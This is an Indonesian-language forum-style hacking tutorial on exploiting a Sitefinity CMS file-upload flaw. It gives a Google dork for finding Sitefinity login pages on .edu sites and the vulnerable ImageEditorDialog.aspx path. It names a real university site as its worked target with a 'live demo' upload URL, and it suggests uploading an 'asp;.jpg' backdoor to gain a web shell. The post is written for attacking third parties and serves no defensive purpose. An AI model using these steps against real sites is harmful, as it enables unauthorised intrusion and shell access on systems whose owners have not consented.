Ok kali ini saya akan mengajarkan cara Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
Langsung aja.. =)
Dork => inurl:Sitefinity/Login.aspx site:edu //Kembangkan sendiri gan..
Exploit => /UserControls/Dialogs/ImageEditorDialog.aspx
Contoh :
1. Kita cari di Om Google, Terus dapet site ini [http://www.usaim.edu/Sitefinity/Login.aspx]
2. Langsung kita Exploit aja Jadi kaya gini [http://www.usaim.edu/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx]
3. Disana ada Form Upload, Langsung aja upload. Tapi bisanya upload file image aja
Live Demo => http://www.usaim.edu/Images/1.JPG
Kalo mau lebih greget pake backdoor asp;.jpg aja =D <-- tutorialnya banyak di google gan.. =)
Sekian ya all tourial dari saya..
Semoga bermanfaat =)
